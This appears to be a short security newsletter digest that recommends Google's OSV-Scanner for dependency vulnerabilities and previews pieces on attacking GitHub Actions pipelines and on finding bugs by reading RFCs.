Google OSV-Scanner

OSV-Scanner is Google’s tool to find existing vulnerabilities affecting dependencies. I think it’s a good addition to your SSDLC. https://github.com/google/osv-scanner

4-part series about hacking GitHub Actions workflows

If I were to predict what attacks will be growing in popularity in 2023, I would bet it’s different kinds of software development pipelines. It’s because they are getting more automated and do more things by themselves which opens more possibilities for nice attacks....

Finding bugs by reading RFCs

Every hacker has a different hacking style. Some of them are absolutely fascinating to me like the hacking style of Inti. He likes to simply read the docs or RFCs and do the research. It almost sounds too stupid to work but his findings prove it does. In his recent...